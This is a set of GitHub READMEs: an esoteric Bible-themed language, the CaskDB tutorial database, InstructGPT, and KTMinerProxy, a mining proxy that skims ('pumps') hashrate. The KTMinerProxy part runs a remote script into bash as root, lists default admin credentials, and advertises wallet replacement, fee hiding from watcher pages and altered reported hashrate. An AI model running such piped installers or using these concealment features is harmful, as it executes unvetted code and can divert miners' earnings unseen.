𐤄𐤂𐤃𐤓 𐤍 = 𐤁׳
𐤄𐤂𐤃𐤓 𐤂𐤀𐤅𐤋 = ((𐤂׳ * (𐤉׳ ^ 𐤇׳)) * ((𐤉״𐤀 / 𐤉׳) * (𐤉׳ ^ 𐤆׳)) * (((𐤔׳ + 𐤔׳ * 𐤉׳) / (𐤕״𐤒)) * (𐤉׳ ^ (𐤅׳ - 𐤌׳))) * (𐤀׳ - 𐤁׳)) * (𐤀׳ / (𐤍 * 𐤍))
𐤄𐤃𐤐𐤎 𐤂𐤀𐤅𐤋
𐤒-𐤃-𐤔 𐤀𐤍𐤓𐤂𐤉𐤄
</pre>

FAQ
------

### Why not use Modern Hebrew?

If you are able to program in this language, I have failed.

### Why are you running an interpreted language on top of an interpreted language?

> "*Wherefore, just as sin came into the world through one man, and death through sin, and so death spread to all men because all sinned*" [^4]

### Why not make an object-oriented language?

This suggestion fills me with consternation. Genesis will never be object-oriented because the Bible explicitly forbids object worship:

> "*These prized objects are really worthless. The people who worship idols don't know this, so they are all put to shame. Their eyes are closed, and they cannot see. Their minds are shut, and they cannot think. The person who made the idol never stops to reflect, 'Why, it's just a block of wood! I burned half of it for heat and used it to bake my bread and roast my meat. How can the rest of it be a god? Should I bow down to worship a piece of wood?'*" [^5]

[^1]: [Psalm 139:13-16](https://www.biblegateway.com/passage/?search=Psalm%20139%3A13-16&version=NIV)
[^2]: [Isaiah 55:6-7](https://www.biblegateway.com/passage/?search=Isaiah%2055%3A6-7&version=KJV)
[^3]: [Exodus 3:14](https://www.biblegateway.com/passage/?search=Exodus%203%3A14&version=KJV)
[^4]: [Romans 5:12-13](https://biblia.com/bible/esv/romans/5/12-13)
[^5]: [Isaiah 44:9-20](https://www.biblestudytools.com/nlt/isaiah/passage/?q=isaiah+44:9-20)
God's actual programming language.
bible,hebrew,procedural-programming,interpreter
releases: 2 · contributors: 2 · pulls: 2 · commits: 32 · issues: 9 · branches: 1 · workflows: 0
avinassh/py-caskdb
![logo](assets/logo.svg)

# CaskDB - Disk based Log Structured Hash Table Store

![made-with-python](https://img.shields.io/badge/Made%20with-Python-1f425f.svg)
[![build](https://github.com/avinassh/py-caskdb/actions/workflows/build.yml/badge.svg)](https://github.com/avinassh/py-caskdb/actions/workflows/build.yml)
[![codecov](https://codecov.io/gh/avinassh/py-caskdb/branch/master/graph/badge.svg?token=9SA8Q4L7AZ)](https://codecov.io/gh/avinassh/py-caskdb)
![GitHub License](https://img.shields.io/github/license/avinassh/py-caskdb)
[![twitter@iavins](https://img.shields.io/twitter/follow/iavins?style=social)](https://twitter.com/iavins)

![architecture](https://user-images.githubusercontent.com/640792/167299554-0fc44510-d500-4347-b680-258e224646fa.png)

CaskDB is a disk-based, embedded, persistent key-value store based on [Riak's bitcask paper](https://riak.com/assets/bitcask-intro.pdf), written in Python. It is focused more on education than on production use. The file format is platform, machine, and programming-language independent; for example, a database file created from Python on macOS should be compatible with Rust on Windows.

This project aims to help anyone, even a beginner in databases, build a persistent database in a few hours. There are no external dependencies; the Python standard library is enough. If you are interested in writing the database yourself, head to the workshop section.

## Features

- Low latency for reads and writes
- High throughput
- Easy to back up / restore
- Simple and easy to understand
- Stores data much larger than the RAM

## Limitations

Most of the following limitations are CaskDB's own; however, some are due to design constraints of the Bitcask paper.

- A single file stores all the data, and deleted keys still take up space
- CaskDB does not offer range scans
- CaskDB requires keeping all the keys in memory; with a lot of keys, RAM usage will be high
- Slow startup time, since it needs to load all the keys into memory

## Community

[![CaskDB Discord](https://img.shields.io/discord/851000331721900053)](https://discord.gg/HzthUYkrPp)

Consider joining the Discord community to build and learn the KV store with peers.

## Dependencies

CaskDB does not require any external libraries to run. For local development, install the packages from [requirements_dev.txt](requirements_dev.txt):

    pip install -r requirements_dev.txt

## Installation

PyPI is not used for CaskDB yet ([issue #5](https://github.com/avinassh/py-caskdb/pull/5)), so you'd have to install it directly from the repository by cloning.

## Usage

```python
disk: DiskStorage = DiskStore(file_name="books.db")
disk.set(key="othello", value="shakespeare")
author: str = disk.get("othello")
# it also supports a dictionary-style API:
disk["hamlet"] = "shakespeare"
```

## Prerequisites

The workshop is for intermediate-advanced programmers. Knowing Python is not a requirement, and you can build the database in any language you wish. Not sure where you stand? You are ready if you have done the following in any language:

- Used a dictionary or hash-table data structure
- Converted an object (class, struct, or dict) to JSON, and converted JSON back into objects
- Opened a file to write or read anything; a common task is dumping a dictionary's contents to disk and reading it back

## Workshop

**NOTE:** I don't have any [workshops](workshop.md) scheduled shortly. [Follow me on Twitter](https://twitter.com/iavins/) for updates. [Drop me an email](http://scr.im/avii) if you wish to arrange a workshop for your team/company.

CaskDB comes with a full test suite and a wide range of tools to help you write a database quickly. [A GitHub action](https://github.com/avinassh/py-caskdb/blob/master/.github/workflows/build.yml) is present with an automated test runner, code formatter, linter, type checker and static analyser. Fork the repo, push the code, and pass the tests!

Throughout the workshop, you will implement the following:

- Serialiser methods that take objects and serialise them into bytes, and procedures that take bytes and deserialise them back into objects
- A data format with a header and data for storing the bytes on disk; the header holds metadata like the timestamp, key size, and value size
- Storing and retrieving data from the disk
- Reading an existing CaskDB file to load all keys

### Tasks

1. Read [the paper](https://riak.com/assets/bitcask-intro.pdf). Fork this repo and check out the `start-here` branch
2. Implement the fixed-size header, which encodes the timestamp (uint, 4 bytes), key size (uint, 4 bytes), and value size (uint, 4 bytes) together (a sketch follows this list)
3. Implement the key and value serialisers, and pass the tests in `test_format.py`
4. Figure out how to store the data on disk and keep the row pointer in memory. Implement the get/set operations; tests for these are in `test_disk_store.py`
5. The code from tasks #2 and #3 should be enough to read an existing CaskDB file and load the keys into memory
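Task 2's header can be sketched with `struct` in a few lines. The little-endian `<III` layout and the function names below are illustrative assumptions, not the exact format the repo's tests expect:

```python
import struct

# Three unsigned 4-byte ints: timestamp, key size, value size.
HEADER_FORMAT = "<III"
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)  # 12 bytes

def encode_header(timestamp: int, key_size: int, value_size: int) -> bytes:
    return struct.pack(HEADER_FORMAT, timestamp, key_size, value_size)

def decode_header(data: bytes) -> tuple[int, int, int]:
    return struct.unpack(HEADER_FORMAT, data[:HEADER_SIZE])

header = encode_header(1658000000, len(b"othello"), len(b"shakespeare"))
assert decode_header(header) == (1658000000, 7, 11)
```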
Use `make lint` to run mypy, black, and the pytype static analyser. Run `make test` to run the tests locally. Push the code to GitHub, and the tests will run on different OSes: Ubuntu, macOS, and Windows.

Not sure how to proceed? Check the [hints](hints.md) file, which contains more details on the tasks, plus hints.

### Hints

- Check out the documentation of [struct.pack](https://docs.python.org/3/library/struct.html#struct.pack) for serialisation methods in Python
- Not sure how to come up with a file format? Read the comment in the [format module](format.py)
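Putting that header together with task 4's idea (an append-only file plus an in-memory dict mapping each key to the byte offset of its latest record) gives a toy store like the one below. The class, method names and record layout are mine and are simplified relative to bitcask (no timestamp or CRC):

```python
import os

class ToyDiskStore:
    """Append-only log plus in-memory offsets; a toy, not the workshop solution."""

    def __init__(self, path: str):
        self.path = path
        self.key_dir: dict[str, int] = {}  # key -> offset of its latest record
        open(self.path, "ab").close()      # ensure the file exists

    def set(self, key: str, value: str) -> None:
        k, v = key.encode(), value.encode()
        with open(self.path, "ab") as f:
            f.seek(0, os.SEEK_END)
            self.key_dir[key] = f.tell()            # remember record start
            f.write(len(k).to_bytes(4, "little"))   # key size
            f.write(len(v).to_bytes(4, "little"))   # value size
            f.write(k + v)

    def get(self, key: str) -> str | None:
        offset = self.key_dir.get(key)
        if offset is None:
            return None
        with open(self.path, "rb") as f:
            f.seek(offset)
            key_size = int.from_bytes(f.read(4), "little")
            value_size = int.from_bytes(f.read(4), "little")
            f.seek(key_size, os.SEEK_CUR)           # skip the key bytes
            return f.read(value_size).decode()

store = ToyDiskStore("toy.db")
store.set("othello", "shakespeare")
assert store.get("othello") == "shakespeare"
```

Note how a read costs one seek plus one read regardless of file size; this is the property the bitcask design is built around.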
## What next?

I often get questions about what comes next after the basic implementation. Here are some challenges, with different levels of difficulty:

### Level 1:

- Crash safety: the bitcask paper stores a CRC in each row and verifies the data while fetching the row back
- Key deletion: CaskDB does not have a delete API. Read the paper and implement it
- Instead of a hash table, use a data structure like a red-black tree to support range scans
- CaskDB accepts only strings as keys and values. Make it generic and accept other data types like int or bytes
- At startup, the current implementation loads values into memory. This is unnecessary and can be avoided: just skip the value bytes, since reading only the keys is enough to build the KeyDir

### Level 2:

- Hint file to improve the startup time. The paper has more details on it
- Implement an internal cache which stores some of the key-value pairs. You may explore and experiment with different cache eviction strategies like LRU, LFU, FIFO etc.
- Split the data into multiple files when the files hit a specific capacity

### Level 3:

- Support for multiple processes
- Garbage collector: keys which have been updated or deleted remain in the file and take up space. Write a garbage collector to remove such stale data
- Add an SQL query engine layer
- Store JSON in values and explore making CaskDB a document database like Mongo
- Make CaskDB distributed by exploring algorithms like Raft, Paxos, or consistent hashing

## Name

This project was named cdb earlier and has now been renamed to CaskDB.

## Line Count

```shell
$ tokei -f format.py disk_store.py
===============================================================================
 Language            Files        Lines         Code     Comments       Blanks
===============================================================================
 Python                  2          391          261          103           27
-------------------------------------------------------------------------------
 disk_store.py                      204          120           70           14
 format.py                          187          141           33           13
===============================================================================
 Total                   2          391          261          103           27
===============================================================================
```

## Contributing

All contributions are welcome. Please check [CONTRIBUTING.md](CONTRIBUTING.md) for more details.

## License

The MIT license. Please check `LICENSE` for more details.
(educational) build your own disk based KV store
null
releases: 0 · contributors: 4 · pulls: 17 · commits: 34 · issues: 0 · branches: 3 · workflows: 1
openai/following-instructions-human-feedback
# InstructGPT: Training Language Models to Follow Instructions with Human Feedback

[Paper link][LINK_TO_PAPER]

> Making language models bigger does not inherently make them better at following a user's intent. For example, large language models can generate outputs that are untruthful, toxic, or simply not helpful to the user. In other words, these models are not aligned with their users. In this paper, we show an avenue for aligning language models with user intent on a wide range of tasks by fine-tuning with human feedback. Starting with a set of labeler-written prompts and prompts submitted through the OpenAI API, we collect a dataset of labeler demonstrations of the desired model behavior, which we use to fine-tune GPT-3 using supervised learning. We then collect a dataset of rankings of model outputs, which we use to further fine-tune this supervised model using reinforcement learning from human feedback (RLHF). We call the resulting models InstructGPT. In human evaluations on our prompt distribution, outputs from the 1.3B parameter InstructGPT model are preferred to outputs from the 175B GPT-3, despite having 100x fewer parameters. Moreover, InstructGPT models show improvements in truthfulness and reductions in toxic output generation while having minimal performance regressions on public NLP datasets. Even though InstructGPT still makes simple mistakes, our results show that fine-tuning with human feedback is a promising direction for aligning language models with human intent.

## Contents

- [model-card.md](model-card.md) - InstructGPT model card
- [automatic-eval-samples](automatic-eval-samples/) - Samples from our models (both GPT-3 and InstructGPT) on public NLP benchmarks
- [API distribution labeling instructions](https://docs.google.com/document/d/1MJCqDNjzD04UbcnVZ-LmeXJ04-TKEICDAepXyMCBUb8/edit#) - Google doc of instructions given to contractors for final evaluations on our API prompt distribution
- [Toxicity labeling instructions](https://docs.google.com/document/d/1d3n6AqNrd-SJEKm_etEo3rUwXxKG4evCbzfWExvcGxg/edit?usp=sharing) - Google doc of instructions given to contractors for labeling toxic outputs on the RealToxicityPrompts dataset

[LINK_TO_PAPER]: https://cdn.openai.com/papers/Training_language_models_to_follow_instructions_with_human_feedback.pdf
null
null
releases: 0 · contributors: 960 · pulls: 1 · commits: 5 · issues: 3 · branches: 1 · workflows: 0
kt007007/KTMinerProxy
<div id="top"></div>
<!-- PROJECT LOGO -->
<div align="center">
  <img src="https://raw.githubusercontent.com/kt007007/KTMinerProxy/main/image/logo-1.png" alt="Logo" width="200" height="200">
  <br>

[![Contributors][contributors-shield]][contributors-url]
[![Forks][forks-shield]][forks-url]
[![Stargazers][stars-shield]][stars-url]
[![Issues][issues-shield]][issues-url]

<a href="https://github.com/kt007007/KTMinerProxy">English</a>｜<a href="https://github.com/kt007007/KTMinerProxy/tree/main/Readme/hk">Traditional Chinese</a>

<h1>🔥🔥🔥 Try the all-new KT 3.0, now renamed RustMinerSystem 🔥🔥🔥 Project page: <a href="https://github.com/EvilGenius-dot/RustMinerSystem">https://github.com/EvilGenius-dot/RustMinerSystem</a></h1>

<h2>KTMinerProxy is no longer maintained but still works. For more powerful features and accurate fee pumping for BTC, LTC and other coins, please use <a href="https://github.com/EvilGenius-dot/RustMinerSystem">RustMinerSystem</a>. KT and RustMinerSystem come from the same team, so you can use it with confidence.</h2>

<p>A professional mining-farm operation and maintenance tool: it improves farm profits, detects abnormalities in farms and nodes, and aims to be the farm's best assistant. (This software is only for use in legally licensed areas. By using this software you accept this license by default; if you use it in a restricted area, you bear any resulting legal problems.)</p>

<h3>The original Telegram account was stolen; please join the new group and beware of scams.</h3>

<h3>The original account has been lost and has not been operated by me since February 26. Beware of fraud; the new group link is https://t.me/+7kmdb-SRwXMxYmFl, please forward it within the large group. TG appears to have a vulnerability and a large number of accounts have recently been stolen, so take precautions: when adding strangers, do not display account information or send screenshots, or your account may be stolen as well.</h3>

<h3>Telegram: <a href="https://t.me/rustkt">https://t.me/rustkt</a></h3>
</div>

<h1>KTMinerProxy</h1>

<p>:zap: Original and genuine, and powerful. Supports lossless fee pumping for BTC ETC ETH LTC ERG CFX RVN SERO XMR CKB BEAM ALPH KASPA DCR FLUX NEOX and other coins, with no memory blow-ups; 9,000 devices run without pressure or crashes; statistics are accurate to 24-hour data for a single device; custom tunnel push tool and other powerful functions...</p>

<p align="center"><img src="./image/tiny.png" alt="Logo"></p>

<h2>One-click toolbox for Linux</h2>
<p>The root user directly executes the following command and selects the corresponding function according to the prompts.</p>

```
bash <(curl -s -L https://raw.githubusercontent.com/kt007007/KTMinerProxy/main/linux-install.sh)
```

<h2>Disclaimer</h2>
<p>This software is only for use in areas permitted by law. By using this software you accept this license by default. If you use it in restricted areas, you are responsible for any legal problems.</p>

# Catalogue

<ol>
  <li><a href="#uplog">Changelog</a></li>
  <li><a href="#gn">Functions</a></li>
  <li><a href="#install">Deploy the software</a>
    <ul>
      <li><a href="#linux">Linux</a>
        <ul>
          <li><a href="#linux">Install</a></li>
          <li><a href="#linux">Update</a></li>
          <li><a href="#linux">Uninstall</a></li>
          <li><a href="#linux">Stop the service</a></li>
          <li><a href="#linux">Start the service</a></li>
          <li><a href="#linux">Restart the service</a></li>
          <li><a href="#linux">Start on boot</a></li>
          <li><a href="#linux">Set the maximum number of connections</a></li>
          <li><a href="#linux">View the program runtime log</a></li>
        </ul>
      </li>
      <li><a href="#windows">Windows</a></li>
      <li><a href="#_kenc">Local encryption client KENC</a></li>
    </ul>
  </li>
  <li><a href="#about">Common problems</a>
    <ul>
      <li><a href="#q15">Memory</a></li>
      <li><a href="#q0">Process daemon</a></li>
      <li><a href="#q1">Default account and password</a></li>
      <li><a href="#q1">Hashrate is wavy</a></li>
      <li><a href="#q2">Load balancing</a></li>
      <li><a href="#q3">curl: command not found during installation</a></li>
      <li><a href="#q4">Modify the startup port</a></li>
      <li><a href="#q5">Change password</a></li>
      <li><a href="#q6">"dial tcp connection refused" at startup</a></li>
      <li><a href="#q7">Close/delete a port</a></li>
      <li><a href="#q8">Installation prompt: install killall failed, install psmisc manually before running the installer</a></li>
      <li><a href="#q9">WEB access is stuck on the LOADING screen for a long time</a></li>
      <li><a href="#q11">IP blacklist</a></li>
      <li><a href="#q12">ETH and ETC chip machines</a></li>
      <li><a href="#q18">Innosilicon A11 series issues</a></li>
      <li><a href="#q13">Local hashrate modification</a></li>
      <li><a href="#q14">Migration</a></li>
      <li><a href="#q10">Development fee and hashrate loss</a></li>
      <li><a href="#q16">Watcher link</a></li>
      <li><a href="#q17">Common reasons for insufficient hashrate</a></li>
    </ul>
  </li>
  <li><a href="#about">Disclaimer</a></li>
  <li><a href="#about">Contact us</a></li>
</ol>

<span id="gn"></span>

### Core functions

- Lossless fee pumping for all supported coins
- Advanced memory management mechanism; up to 8,000 devices on a single machine have run stably so far
- 24-hour statistical analysis of data, accurate to a single device
- TLS/SSL/KENC encryption
- Companion local encryption tool
- Preset mining pools for various coins (updated at any time)
- Soft anti-CC protection
- Multi-wallet configuration
- Replace specified wallets
- Unified wallet
- Mining pool mode
- Quick import and export of all configurations
- Modify the local hashrate shown in the mining pool
- IP blacklist
- Custom RSA encryption key
- Custom certificates
- Custom configuration
- Disconnection reminder
- The same watcher address as the mining pool's official website
- Ultra-low handling fee

### Coins that already support pumping (to request a new coin, contact the administrator on Telegram; it can usually be added within a day)

- BTC
- ETC
- ETH
- LTC
- ERG
- CFX
- RVN
- SERO
- XMR
- CKB
- BEAM
- ALPH
- KASPA
- DCR
- FLUX
- NEOX
- RXD
- MEOW
- LBC
- CTXC
- HNS
- ALEO
- DNX
- ...
<span id="uplog"></span>

# Changelog

```
2.9.8
    Fixed several issues with kaspa
2.9.7
    Added NEXA currency
2.9.6
    Added DNX currency
2.9.5
    Added ALEO currency
2.9.2
    [Important update] Fixed the problem that the device would disconnect while working
2.9.0
    Added meox currency (based on T-rex kernel test; if the certificate does not match, append --no-strict-ssl to the kernel startup command)
    Added ctxc currency (based on gminer test)
    Fixed the problem that ckb, erg, flux, hns, lbc, neox and rvn could be invalid in some cases
2.8.9
    Fixed ETHW hashrate display issue
    Fixed the problem that KASPA reported an error under bzminer
2.8.8
    Added ETF and its chip machines
    Added ETHW and its chip machines
2.8.7
    Fixed excessive pumping caused by an anti-cheating bug
2.8.6
    Fixed a bug that caused the software to crash for some small currencies
    Added LBC
    Added HNS
2.8.5
    Added NEOX currency
2.8.4
    FLUX can now run in lossless mode (gminer is recommended)
2.8.3
    FLUX (compatibility mode) supported
    Fixed a bug in the display of the hashrate chart on the home page in some cases
    Added display of the core or model of chip machines
2.8.2
    Fixed ETC devices appearing in wallets where they shouldn't be
2.8.1
    Added hardware monitoring
    Added a watcher-address option to hide the fee
    Added a log of sensitive operations; the log is displayed where the announcement used to be
2.8.0
    [Important Update] [Security Update] Fixed a serious security vulnerability; remember to change the [account] and [password] after updating
2.7.9
    Added dcr pumping (compatibility mode)
    Fixed a possible error in etc, kaspa, bch and erg
2.7.8
    Added per-device modification of the pumping ratio
    Added an alternate pumping address
2.7.7
    Fixed several issues with erg
    Improved the display of the number of online/offline devices
2.7.6
    Fixed kaspa's high invalid-share rate
2.7.5
    Added a pure forwarding port, similar to nginx
    Added the date of the last submitted share
    Improved page details and themes
2.7.4
    [Important Update] Fixed a bug where custom certificates would be automatically restored, affecting 2.6.x-2.7.3
2.7.3
    Improved the new layouts and themes
2.7.2
    Added new layouts and themes
2.7.1
    Machines with the same name from different wallets are now displayed separately
    Added a custom RSA key for the KENC port (this is only for building your own client; usually do not configure it, otherwise the KENC port will not connect normally)
2.7.0
    Fixed KASPA's high invalid-share rate
2.6.9
    Added KASPA pumping
2.6.8
    Fixed an issue where custom configurations for several currencies could not be found when creating ports
    Fixed an issue that caused the software to crash when mining XMR
    Improved program stability
2.6.7
    Added XMR hashrate statistics
    Added ERG hashrate statistics
    Added RVN hashrate statistics
    Added an error message when the kernel does not match the certificate
    Improved XMR logs
    Fixed an issue with multiple XMR devices being merged
2.6.6
    Fixed ALPH's high invalid-share rate
    Fixed a case where ETC pumping could produce invalid shares
    Revised the descriptions of some currencies when adding ports
2.6.5
    The KENC push address is now an encrypted address; only the latest KENC client supports it. If you need this function, download the KENC client and the 2.6.5 KT client again.
    Improved logging of device details
    Improved the login interface
2.6.4
    Added ALPH pumping
2.6.3
    Fixed BEAM pumping being too high
2.6.2
    [IMPORTANT UPDATE] Slightly increased ETH hashrate in some pools
    Reduced invalid shares of Yami devices on the ETH port
    Added BEAM pumping
2.6.1
    Fixed ERG's high invalid-share rate
    Fixed RVN's high invalid-share rate
2.6.0
    Added CKB pumping
    Improved the output of the port log
2.5.9
    Fixed an issue where A11 would disconnect under a certain pool
    Added batch replacement of port certificates; you can batch-replace certificates in Settings - Certificate Management
    Fixed the rectangular chart not displaying subcategories under the same category
2.5.8
    Added XMR pumping
2.5.7
    Added a rectangular (treemap) view of port statistics, making totals easier to see
    Fixed hashrate statistics for some small coins
2.5.6
    Added LTC pumping
2.5.5
    Added SERO pumping
    Implemented hashrate statistics for all small currencies that support pumping
2.5.4
    Fixed uneven hashrate distribution when the number of pumping wallets is greater than 1
2.5.3
    Added the observer link; enable it under edit port - advanced settings
2.5.2
    Fixed chip machines such as Jasmine not being able to log in when connected to the ETH port
    Slightly increased memory usage to reduce the probability of invalid shares
2.5.1
    Support replacing multiple designated wallets with the target wallet
    Fixed a bug where the ETC chip machine A11 and some small currencies might not work properly in lossless mode
2.5.0
    Fixed excessive pumping in 2.4.x
    Added the function of replacing a specified wallet address
    Added a device-name regex filter setting
    Fixed a case where hashrate statistics would not work
    Lowered memory usage by about a factor of three; a single device now occupies about 500 KB of memory
2.4.3
    Added CFX pumping
    Added ERG pumping
    Added RVN pumping
    Fixed a case where ETC and ETH chip machines could produce invalid shares
2.4.2
    Added support for NiceHash
2.4.1
    Fixed ETC chip-machine related issues
2.4.0
    Changed the logo
    Fixed BTC pumping being too low
    Introduced the ETC lossless mechanism
    Added support for ETC chip machines
    Updated the logic of BCH
    Added a disconnection log to the port log
2.3.3
    Improved A11 support
2.3.2
    Added compatibility mode; try it when some currencies or models become invalid after working for a while and cannot continue
    Optimized BTC; models and pools that cannot be pumped can use compatibility mode
    Optimized A11; for A11 machines, select the ETH chip-machine port type and lossless mode
    Updated KENC; all KENC client users please download the latest KENC
    Opened the BTC unified wallet
2.3.1
    Added KENC configuration push to settings
    Fixed some display issues on the page
2.3.0
    BTC now supports all mining pools
    Introduced the BTC lossless mechanism
    Implemented BTC hashrate statistics
    Added BTC dynamic-difficulty pumping
2.2.7
    Fixed a bug where lossless logic temporarily failed in special cases
    Reduced the data size, cutting the memory footprint by about a third
2.2.6
    Fixed some memory-related issues
    Fixed the TEAMRED kernel erroring midway
    Improved the lossless logic (needs testing at scale)
2.2.5
    Fixed dynamic difficulty adjustment not working in some cases
    Fixed probabilistic disconnects with some kernels
    Added the device's IP to the device details
2.2.4
    ETH now has a dynamic-difficulty pumping mechanism; cross-pool pumping also draws a proportional hashrate
    Slightly improved the hashrate of the Phoenix kernel
    Fixed some kernels not displaying the name and hashrate
2.2.3
    Added local hashrate modification
2.2.2
    Greatly stabilized the hashrate compensation mechanism, giving you stable happiness
2.2.1
    Innosilicon is supported; select ETH chip machine when creating a port
    Fixed the name issue of hashrate-compensation machines and slightly increased hashrate for both parties
    Fixed the IP blacklist being lost when editing a port in the web UI
2.2.0
    Greatly reduced ETH loss
    Added difficulty stats
2.1.1
    Fixed major hashrate loss caused by the new mechanism
2.1.0
    Greatly reduced hashrate loss in special network environments
    Killed ghost devices
    Fixed machines in the mining pool being merged into "default"
    Fixed an issue with the TEAMRED kernel
    Added the KENC tunneling protocol
    Added a soft anti-CC strategy
    Added the IP blacklist function
    TOKEN timeout now returns to the login page with the account and password retained
    Fixed Chinese text in custom configurations not saving
    Fixed issues related to port certificates
2.0.1
    Fixed low target-machine hashrate caused by BTC pumping
2.0.0
    Implemented BTC and BCH pumping
    Custom configurations can now be imported, exported and preserved across platforms
1.1.5
    Fixed some pumping issues
1.1.4
    Fixed a disconnection bug caused by pumping
1.1.3
    Implemented the disconnection reminder
    Fixed some places that could increase latency
    The web access port can now be changed from the web page
    New security logic to avoid being scanned
    Support account modification
    Fixed some kernels garbling the device name
1.1.2
    Greatly improved program stability
1.1.1
    Greatly improved program stability
    Re-opened small-currency forwarding
1.1.0
    Fixed the local hashrate floating
    More stable persistent connections
    Different ratios for different wallets are supported
    Opened the spare (backup) pool
    Added the port log
    Gentler pumping
    Fixed Binyin's new TLS address not connecting
    Increased device connection time
    Added wallet and machine-name search
    Fixed a spot prone to memory leaks; the program is more stable
    Fixed some small-currency custom configurations not taking effect
    New installation script for easier management, supporting functions such as changing the startup port
1.0.0
    Fully effective pumping of shares
    New pumping logic
    Installed btc (to be tested)
    Sometimes the hashrate of a device in the port shows 0; don't worry, it is a display problem only. If concerned, check the kernel output; this will be optimized later
    The development fee is now increased by 1/10,000
0.9.9
    Multiple wallets can be configured
    Fixed share loss when pumping is enabled
    New get-task logic; shares are obtained faster
    Added common custom configuration management
    A port's configuration can be exported separately
    Improved page details
    Displays the normal in-range share statistics chart
    Added a per-machine log; click the machine to view details (continuously updated)
    Added one-click default configuration
    Fixed login failures caused by SN conflicts
0.1.1
    Fixed the memory explosion problem
    Fixed excessive hashrate of the pumping wallet
    When the port is closed, you can switch SSL and reconfigure the certificate
    Removed the automatic update function
    Removed invalid settings
0.0.9
    Fixed several critical issues that caused the software to crash
    Fixed share loss caused by TCP packet sticking
    Fixed the chart not being visible on first startup
    Changed the pumping algorithm to a random algorithm; the curve is more stable
    Added port TLS certificate configuration
    Added a mining pool connection status test
    Added pumped-share statistics
    Added viewing of the original wallet address; the machine code can be viewed at the lower right of the login page
0.0.8
    Fixed the unified pumping wallet not taking effect
    Changed the pumping logic: the frequency is now higher and the mining pool curve is more stable
    Added list paging and settings
    Fixed currencies with statistics sometimes also displaying unknown devices
0.0.6
    The default port number was changed to 16777
    Changed the process-daemon mode
    Page optimization
    The data list is sorted by default
    Fixed the replacement port failing to start
    Currencies that forward normally but lack statistics now show their devices in the list
    Added configuration of the pumping device name
    Added unified-name configuration for mining pool mode
    Added a language pack
0.0.5
    Stability improvements
    Added some ETH preset mining pools
    Fixed SSL connection failures to the target mining pool
```

<!-- GETTING STARTED -->
<p id="install"></p>
<p id="linux"></p>

# Linux

The root user directly executes the following command and selects the corresponding function according to the prompts.

```
bash <(curl -s -L https://raw.githubusercontent.com/kt007007/KTMinerProxy/main/linux-install.sh)
```

### After the installation is complete, immediately change the login account, password and startup port to prevent brute-forcing.

<img src="./image/t12.png" alt="Logo">

Supported Linux:

* Ubuntu 64 18.04+
* CentOS 64 7+

<p id="windows"></p>

# Windows

After downloading, you can start it directly; the program has a built-in process daemon.

<a href="https://github.com/kt007007/KTMinerProxy/tree/main/Windows-64">Download link</a>

<span id="_kenc"></span>

# KENC

<p>Go to <a href="https://github.com/kt007007/KTMinerProxy/tree/main/KENC">https://github.com/kt007007/KTMinerProxy/tree/main/KENC</a> and download it yourself.</p>
<p><a href="#kenc">KENC help documentation</a></p>

<p id="question"></p>
<p id="about"></p>

# Common problems

<span id="q0"></span>

## Process daemon

<p>The program comes with its own process daemon. Don't, don't, do not use supervisor or similar tools to keep the process alive, otherwise the process will be started repeatedly.</p>

<span id="q1"></span>

## The hashrate is wavy

<img src="./image/t10.png" alt="Logo"><br>
<p>If the situation in the picture above appears, you have opened multiple KTMinerProxy instances on the same port; close the redundant processes.</p>
<p>If you make a mirror copy, the same problem occurs.
<span id="q2"></span>

## Load balancing

<p>...</p>

<span id="q3"></span>

## Installation prompts "curl: command not found"

<p>This message means your Linux system does not have curl installed. Update the package index, install curl, wait for the command to complete, then run the installation script again (see the snippet below).</p>
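The FAQ's two commands collected into one snippet (Ubuntu/Debian; on CentOS you would use its own package manager instead, which this FAQ does not cover):

```
apt-get update
apt install curl
```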
<span id="q4"></span>

## Changing the startup port

<p>Run the installation script, choose the "modify port" option, and enter the new port number.</p>

<span id="q5"></span>

## Changing the password

<p>After installation, go to the settings page and change the password as soon as possible.</p>

<span id="q6"></span>

## "dial tcp ... connection refused" at startup

<p>Add ktproxy.com to your firewall whitelist; this domain provides the chart service and authentication.</p>

<span id="q7"></span>

## Closing/deleting a port

<img src="./image/t11.png" alt="Logo">
<p>Click the location marked in the picture to delete or close the port.</p>

<span id="q8"></span>

## Installation prompt: "install killall failed!!!!"

<p>Check the server's package mirror and install psmisc manually.</p>

<span id="q9"></span>

## Web access is stuck on the LOADING screen for a long time

<p>After an installation or update, the web interface may take a long time to load the first time. If it still does not load after a long wait, switch to the Chrome browser.</p>

<span id="q1"></span>

## Default account and password

<p>Default account: admin</p>
<p>Default password: admin123</p>

<span id="q10"></span>

## Hashrate loss

<p>Many things can cause hashrate loss; check the following before blaming the developer fee:</p>
<p>Check the proportion of stale shares at the pool. If the stale rate is above 1%, ping the server to check latency.</p>
<p>The skimmed hashrate varies from pool to pool; if the two pools use different difficulties, the reported hashrate will also differ.</p>

<span id="q11"></span>

## IP blacklist

<p>On the settings page, the IP blacklist tab lets you add IPs to the blacklist.</p>
<p><img src="./image/jt18.png"></p>

<span id="q12"></span>

## ETH/ETC ASICs ("chip machines")

<p>Common models such as Cow, Jasmine and Yami should use the ETH port. For the Innosilicon series and other models, select the ETH (GetWork) port.</p>
<p>If a device cannot connect normally, try the different port types in turn.</p>

<span id="q18"></span>

## Innosilicon A11 series issues

<p>For the A11, the fee-skimming pool must be the same as the target pool.</p>
<p>If the reject rate is still high with the same pool, downgrade or upgrade the firmware to version a11_20211026_060307; MX models need version a11mx_20211220_124402.</p>

<span id="q13"></span>

## Local hashrate modification

<p>When adding or editing a port, the locally displayed hashrate for ETH and ETC can be modified under the [Advanced] tab.</p>

<span id="q14"></span>

## Service migration

<p>No matter how you migrate the program, delete the license file in the new directory after migration and then restart the program.</p>

<span id="q15"></span>

## Memory usage

<p>Peak memory usage is currently kept to about 1.5 MB per connected device and is still being observed and tuned; it will be reduced further as warranted. Size your hardware according to the number of connected devices.</p>

<span id="q16"></span>

## Observer link

<p>Open Port Settings - Advanced Settings, find the observer link, enable and save it, then find the observer link in the lower-left corner of the port details page.</p>

<span id="q17"></span>

## Common reasons for insufficient hashrate

<p>If, after testing, the gap between the 24-hour average and the configured fee is too large (for example the fee is set to 1% but the average loss is much more), there are many possible causes and you need to check them step by step.</p>

<p>First check whether the problem is local or with the equipment. Some devices forward very inefficiently; this usually indicates a problem with a hashboard and is easy to spot once found. In KT, find the device with a high reject rate, click it, and look for POW-related keywords in its log. If there are many, that device's hardware has a problem, causing rejects and low hashrate.</p>

